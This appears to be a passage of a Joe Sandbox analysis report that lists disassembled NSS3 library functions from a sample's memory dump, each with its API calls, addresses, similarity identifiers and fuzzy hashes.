PORT_NewArena_Util.NSS3(00000800,00000000,00000000,?,6C817F4A,00000000,?,00000000,00000000), ref: 6C838585
PORT_ArenaAlloc_Util.NSS3(00000000,00000034,?,00000000,00000000,?,6C817F4A,00000000,?,00000000,00000000), ref: 6C83859A
SEC_ASN1DecodeItem_Util.NSS3(00000000,00000000,6C91D8C4,6C8395D0,?,?,?,00000000,00000000,?,6C817F4A,00000000,?,00000000,00000000), ref: 6C8385CC
SECOID_GetAlgorithmTag_Util.NSS3(-0000001C,?,?,?,?,?,?,?,00000000,00000000,?,6C817F4A,00000000,?,00000000,00000000), ref: 6C8385E1
PORT_FreeArena_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,00000000,00000000,?,6C817F4A,00000000,?), ref: 6C8385F4

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$AlgorithmArena_Tag_$Alloc_ArenaDecodeFindFreeItem_
String ID:
API String ID: 738345241-0
Opcode ID: e0022aeae145c2f34f342bea5ec9275aaeb08a21e020dfe78332d0785a48968f
Instruction ID: 636e3dc35a73568941cb8a13c62febe904e126bb965ce47c227bc1419c9dfe0d
Opcode Fuzzy Hash: e0022aeae145c2f34f342bea5ec9275aaeb08a21e020dfe78332d0785a48968f
Instruction Fuzzy Hash: 83313AA1F0512057EF3085A88E88B6A2218AB1139CF553E77F81DD7EE2FB90CD5446E2

Function 6C804590 Relevance: 10.6, APIs: 7, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C8045B5

Part of subcall function 6C850FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7F87ED,00000800,6C7EEF74,00000000), ref: 6C851000
Part of subcall function 6C850FF0: PR_NewLock.NSS3(?,00000800,6C7EEF74,00000000), ref: 6C851016
Part of subcall function 6C850FF0: PL_InitArenaPool.NSS3(00000000,security,6C7F87ED,00000008,?,00000800,6C7EEF74,00000000), ref: 6C85102B

PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C8045C9

Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C8510F3
Part of subcall function 6C8510C0: EnterCriticalSection.KERNEL32(?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85110C
Part of subcall function 6C8510C0: PL_ArenaAllocate.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851141
Part of subcall function 6C8510C0: PR_Unlock.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851182
Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85119C

memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C8045E6
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C8045F8

Part of subcall function 6C84FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C848D2D,?,00000000,?), ref: 6C84FB85
Part of subcall function 6C84FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C84FBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C804647
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C91A0F4,?), ref: 6C80468C
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C8046A1

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpymemset
String ID:
API String ID: 1594507116-0
Opcode ID: 6ae94d396efd171791aaea7f9e76fcdea27eb74e12ecfe64229c186c2ce83c57
Instruction ID: b774a133e73ae84e7fb00e438b4faf35825395c91d8b4cec06e3a378460989cd
Opcode Fuzzy Hash: 6ae94d396efd171791aaea7f9e76fcdea27eb74e12ecfe64229c186c2ce83c57
Instruction Fuzzy Hash: 4431D8B1B403145BFF209E58DD5176B36A89BD6318F004838D915DF781F775DC0887A6

Function 6C812E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C80E728,?,00000038,?,?,00000000), ref: 6C812E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C812E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C812E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C812E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C812E9E
PR_Unlock.NSS3(?), ref: 6C812EAB
PR_Unlock.NSS3(?), ref: 6C812F0D

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 74dc9355741ac8cb8793f1cbb5a2802720959d6def28be9da8d8bade13ea145c
Instruction ID: 6c573a29a62b12d95f8a3487411cd3483452df32db41f03c716f9ef07d8ddd9e
Opcode Fuzzy Hash: 74dc9355741ac8cb8793f1cbb5a2802720959d6def28be9da8d8bade13ea145c
Instruction Fuzzy Hash: 7831E776A041069FEB106F28DD44866B7B5EF06259F148974EC0887A11EB31DD64C7D0

Function 6C844470 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6C807296,00000000), ref: 6C844487
EnterCriticalSection.KERNEL32(?,?,?,6C807296,00000000), ref: 6C8444A0
PR_Unlock.NSS3(?,?,?,?,6C807296,00000000), ref: 6C8444BB
SECMOD_DestroyModule.NSS3(?,?,?,?,6C807296,00000000), ref: 6C8444DA
DeleteCriticalSection.KERNEL32(?,?,?,?,6C807296,00000000), ref: 6C844530
free.MOZGLUE(?,?,?,?,?,6C807296,00000000), ref: 6C84453C
PORT_FreeArena_Util.NSS3 ref: 6C84454F

Part of subcall function 6C82CAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C80B1EE,D958E836,?,6C8451C5), ref: 6C82CAFA
Part of subcall function 6C82CAA0: PR_UnloadLibrary.NSS3(?,6C8451C5), ref: 6C82CB09

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalSection$Arena_DeleteDestroyEnterFreeLibraryModuleSecureUnloadUnlockUtilValuefree
String ID:
API String ID: 3590924995-0
Opcode ID: b376c3852082f5182a831f3868e3095cc8920223fca9280d42df0f8a502e5e06
Instruction ID: 7f5b067e2900a42142a078a037128a7068ab4a8d4867fa89705b355fbfb67936
Opcode Fuzzy Hash: b376c3852082f5182a831f3868e3095cc8920223fca9280d42df0f8a502e5e06
Instruction Fuzzy Hash: C43152B4A05A059FDB20BF78C184559B7F0FF85359F128969D89997B01E730E898CBC1

Function 6C85CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C85CD93,?), ref: 6C85CEEE

Part of subcall function 6C8514C0: TlsGetValue.KERNEL32 ref: 6C8514E0
Part of subcall function 6C8514C0: EnterCriticalSection.KERNEL32 ref: 6C8514F5
Part of subcall function 6C8514C0: PR_Unlock.NSS3 ref: 6C85150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C85CD93,?), ref: 6C85CEFC

Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C8510F3
Part of subcall function 6C8510C0: EnterCriticalSection.KERNEL32(?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85110C
Part of subcall function 6C8510C0: PL_ArenaAllocate.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851141
Part of subcall function 6C8510C0: PR_Unlock.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851182
Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C85CD93,?), ref: 6C85CF0B

Part of subcall function 6C850840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C8508B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C85CD93,?), ref: 6C85CF1D

Part of subcall function 6C84FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C848D2D,?,00000000,?), ref: 6C84FB85
Part of subcall function 6C84FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C84FBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C85CD93,?), ref: 6C85CF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C85CD93,?), ref: 6C85CF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C85CD93,?,?,?,?,?,?,?,?,?,?,?,6C85CD93,?), ref: 6C85CF78

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 717f8e160b74f35ec6ee03ad92dea1a97767c3fd1446af6f124d8ddf39f5a0be
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 931108B5A0020457EB605E6A7E41B6BB5EC9F5814DF404839EC09D7742FBE1D9288AF1

Function 6C808C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C808C1B
EnterCriticalSection.KERNEL32 ref: 6C808C34
PL_ArenaAllocate.NSS3 ref: 6C808C65
PR_Unlock.NSS3 ref: 6C808C9C
PR_Unlock.NSS3 ref: 6C808CB6

Part of subcall function 6C89DD70: TlsGetValue.KERNEL32 ref: 6C89DD8C
Part of subcall function 6C89DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C89DDB4

Strings

KRAM, xrefs: 6C808C8F

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: d86606eae349df0ee438e400e41c44ed1839f1162e9e928c2c8f1398d75afc22
Instruction ID: 3abe26f3ef341e20ed21e6a300663602acb50631468a3a9c95657dd66e341f75
Opcode Fuzzy Hash: d86606eae349df0ee438e400e41c44ed1839f1162e9e928c2c8f1398d75afc22
Instruction Fuzzy Hash: 29217CB1A056018FD750AF7CCA84569BBF4FF05308F168D6ED8888B711EB31D889CB82

Function 6C902C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C902CA0
PR_ExitMonitor.NSS3 ref: 6C902CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C902CD1
strdup.MOZGLUE(?), ref: 6C902CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C902D27

Strings

Loaded library %s (static lib), xrefs: 6C902D22

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: e84ec9190372ef28dd4590f7b66361b730c12208dd3fdc8d09a91c83db78f8b1
Instruction ID: dd00d7a4e9cec2a85ed62c0926863b3e2c9efbb80dbc48a6bfc6d2478e67227f
Opcode Fuzzy Hash: e84ec9190372ef28dd4590f7b66361b730c12208dd3fdc8d09a91c83db78f8b1
Instruction Fuzzy Hash: 9011E7B17066109FEB109F29D84CA6677B9EB4631DFA4857DD809C7B41D731DC08CBA1

Function 6C850FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7F87ED,00000800,6C7EEF74,00000000), ref: 6C851000
PR_NewLock.NSS3(?,00000800,6C7EEF74,00000000), ref: 6C851016

Part of subcall function 6C8B98D0: calloc.MOZGLUE(00000001,00000084,6C7E0936,00000001,?,6C7E102C), ref: 6C8B98E5

PL_InitArenaPool.NSS3(00000000,security,6C7F87ED,00000008,?,00000800,6C7EEF74,00000000), ref: 6C85102B
TlsGetValue.KERNEL32(00000000,?,?,6C7F87ED,00000800,6C7EEF74,00000000), ref: 6C851044
free.MOZGLUE(00000000,?,00000800,6C7EEF74,00000000), ref: 6C851064

Strings

security, xrefs: 6C851025

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: 3c3d4160e3100e621a9554d723fc51abd2713b4c5b780a9d731caf0b64c99d3e
Instruction ID: 3404334f4808967c8084b008ef191d787eac952865bfb7a54235884f2b31282c
Opcode Fuzzy Hash: 3c3d4160e3100e621a9554d723fc51abd2713b4c5b780a9d731caf0b64c99d3e
Instruction Fuzzy Hash: 850148316042509BEBB03F3D8E08A563678BF0674AF914929E80897A51EBB0C168DBD1

Function 6C892E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C893046

Part of subcall function 6C87EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C87EE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C867FFB), ref: 6C89312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C893154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C892E8B

Part of subcall function 6C89C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C89C2BF

Part of subcall function 6C87F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C869BFF,?,00000000,00000000), ref: 6C87F134

memcpy.VCRUNTIME140(8B3C75C0,?,6C867FFA), ref: 6C892EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C89317B

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: 3d4f4f9eb801fd1ef51a6651692f49e4d8455ba8b4e6f9332495519159e3a511
Instruction ID: c3ecd6c12dbb519ce4f7b6522f464a6cc52c324dea8cc8dfed81e3d66640cfb7
Opcode Fuzzy Hash: 3d4f4f9eb801fd1ef51a6651692f49e4d8455ba8b4e6f9332495519159e3a511
Instruction Fuzzy Hash: C1A1BE71A002189FDB34CF58CC80BEAB7B5EF45308F048599E94A67781E731AD45CFA1

Function 6C85ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C85ED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C85EDCE

Part of subcall function 6C850BE0: malloc.MOZGLUE(6C848D2D,?,00000000,?), ref: 6C850BF8
Part of subcall function 6C850BE0: TlsGetValue.KERNEL32(6C848D2D,?,00000000,?), ref: 6C850C15

free.MOZGLUE(00000000,?,?,?,?,6C85B04F), ref: 6C85EE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C85EECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C85EEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C85EEFB

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 2b1f4877dad95c8c13e2a7983fd713852dce85eb641ab82dc9e836db03286417
Instruction ID: bdefa9e5fcd0a02eab2f2ed3b3d3518711a012003fdc7a386e0c07e0cfd2a95d
Opcode Fuzzy Hash: 2b1f4877dad95c8c13e2a7983fd713852dce85eb641ab82dc9e836db03286417
Instruction Fuzzy Hash: 1B8191B1A002059FEB64CF59CE80B6B77F5FF48308F944828E81597751DBB5E824CBA1

Function 6C85CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C85C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C85DAE2,?), ref: 6C85C6C2

PR_Now.NSS3 ref: 6C85CD35

Part of subcall function 6C8B9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C900A27), ref: 6C8B9DC6
Part of subcall function 6C8B9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C900A27), ref: 6C8B9DD1
Part of subcall function 6C8B9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C8B9DED

Part of subcall function 6C846C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C7F1C6F,00000000,00000004,?,?), ref: 6C846C3F

PR_GetCurrentThread.NSS3 ref: 6C85CD54

Part of subcall function 6C8B9BF0: TlsGetValue.KERNEL32(?,?,?,6C900A75), ref: 6C8B9C07

Part of subcall function 6C847260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C7F1CCC,00000000,00000000,?,?), ref: 6C84729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C85CD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C85CE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C85CE2C

Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C8510F3
Part of subcall function 6C8510C0: EnterCriticalSection.KERNEL32(?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85110C
Part of subcall function 6C8510C0: PL_ArenaAllocate.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851141
Part of subcall function 6C8510C0: PR_Unlock.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851182
Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C85CE40

Part of subcall function 6C8514C0: TlsGetValue.KERNEL32 ref: 6C8514E0
Part of subcall function 6C8514C0: EnterCriticalSection.KERNEL32 ref: 6C8514F5
Part of subcall function 6C8514C0: PR_Unlock.NSS3 ref: 6C85150D

Part of subcall function 6C85CEE0: PORT_ArenaMark_Util.NSS3(?,6C85CD93,?), ref: 6C85CEEE
Part of subcall function 6C85CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C85CD93,?), ref: 6C85CEFC
Part of subcall function 6C85CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C85CD93,?), ref: 6C85CF0B
Part of subcall function 6C85CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C85CD93,?), ref: 6C85CF1D

Part of subcall function 6C85CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C85CD93,?), ref: 6C85CF47
Part of subcall function 6C85CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C85CD93,?), ref: 6C85CF67
Part of subcall function 6C85CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C85CD93,?,?,?,?,?,?,?,?,?,?,?,6C85CD93,?), ref: 6C85CF78

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 252cafee811847a96c4c1c4e9ded58dd62c3e546b9b08016a4959e494cc6aad6
Instruction ID: 6b8ff577be93c9e6fad2b4b82d2a5943734ed960b51d12a240214fab5f6b847b
Opcode Fuzzy Hash: 252cafee811847a96c4c1c4e9ded58dd62c3e546b9b08016a4959e494cc6aad6
Instruction Fuzzy Hash: 3A51C276B001049BEB60DF69DE40BAA77F4AF4C348F650834D844A7742EBB1E925CF91

Function 6C82EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C82EF38

Part of subcall function 6C819520: PK11_IsLoggedIn.NSS3(00000000,?,6C84379E,?,00000001,?), ref: 6C819542

